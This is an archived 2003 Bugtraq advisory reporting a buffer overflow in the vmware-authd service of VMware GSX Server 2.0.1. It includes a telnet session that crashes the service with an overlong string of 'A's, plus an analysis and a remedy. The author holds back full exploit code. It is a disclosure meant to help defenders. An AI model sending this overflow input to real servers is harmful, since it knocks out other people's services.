[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: VMWare GSX Server Authentication Server Buffer Overflow
From: Darryl Swofford <dswofford () kpmg ! com>
Date: 2003-10-31 16:28:55
[Download RAW message or body]
Author: Darryl Swofford
Email: dswofford@kpmg.com
Date: 2003/10/31
System:
VMware GSX Server 2.0.1 build-2129 for Windows (other versions not tested). Tested on \
Windows NT/2000/2003/XP systems.
Description:
After reviewing BugTaq #5294 (VMWare GSX Server Authentication Server Buffer Overflow \
Vulnerability) I was able to modify the sample code to exploit the updated \
vmware-authd service.
I will not release the source code as I feel this is not prudent until the vendor \
acknowledges the issue. Until then you can view the overflow by using telnet with the \
following syntax and simply alter the code as I did.
> telnet VMserver.somecompany.com 902
> 220 VMware Authentication Daemon Version 1.00
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA599 \
vmware-authd PANIC: Buffer overflow in VMAuthdSocketRead()
>
Connection to host lost.
Analyses:
It seems that the vmware-authd service limits the input strings of the program when \
passed correct arguments (USER, PASS, GLOBAL); however the initial readline can be \
overflowed as it does not control the amount of data passed to it.
Remedy:
Stop and disable the VMware authorization service.
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic